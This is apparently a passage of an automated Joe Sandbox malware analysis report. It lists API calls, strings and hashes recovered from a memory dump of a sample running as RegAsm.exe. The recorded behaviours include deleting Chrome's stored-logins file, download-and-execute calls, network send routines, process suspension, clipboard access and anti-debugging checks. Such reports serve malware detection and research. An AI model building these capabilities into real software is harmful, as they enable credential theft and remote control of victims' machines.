                                                                                                                                  • UserProfile, xrefs: 0040BA59
                                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                                  • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                                                                                                  • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                                                                                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                                                                                                  • GetLastError.KERNEL32 ref: 004179D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                  • API String ID: 3534403312-3733053543
                                                                                                                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                                                                                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                                                                                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 00409293
                                                                                                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,02084830,00000010), ref: 004048E0
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                                                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID: SETTINGS
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$FirstNextsend
                                                                                                                                  • String ID: XPG$XPG
                                                                                                                                  • API String ID: 4113138495-1962359302
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
• UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: fYM/
• API String ID: 3906539128-2459865102
Strings
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID:
• String ID: .$fYM/
• API String ID: 0-3740560963
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: p'E$JD
• API String ID: 1084509184-908320845
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
• TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
• ExitProcess.KERNEL32 ref: 0044338F
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
• GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
• TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
• ExitProcess.KERNEL32 ref: 10004AEE
Memory Dump Source
• Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseDataOpen
• String ID:
• API String ID: 2058664381-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
• NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
• CloseHandle.KERNEL32(00000000), ref: 0041BBE7
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenResume
• String ID:
• API String ID: 3614150671-0
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
• NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
• CloseHandle.KERNEL32(00000000), ref: 0041BBBB
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpenSuspend
• String ID:
• API String ID: 1999457699-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID: MZ@
• API String ID: 2325560087-2978689999
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: JD
• API String ID: 1084509184-2669065882
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx
• API String ID: 2299586839-2904428671
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
• String ID:
• API String ID: 1661935332-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
Memory Dump Source
• Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                                  • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                                                                                                                  • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
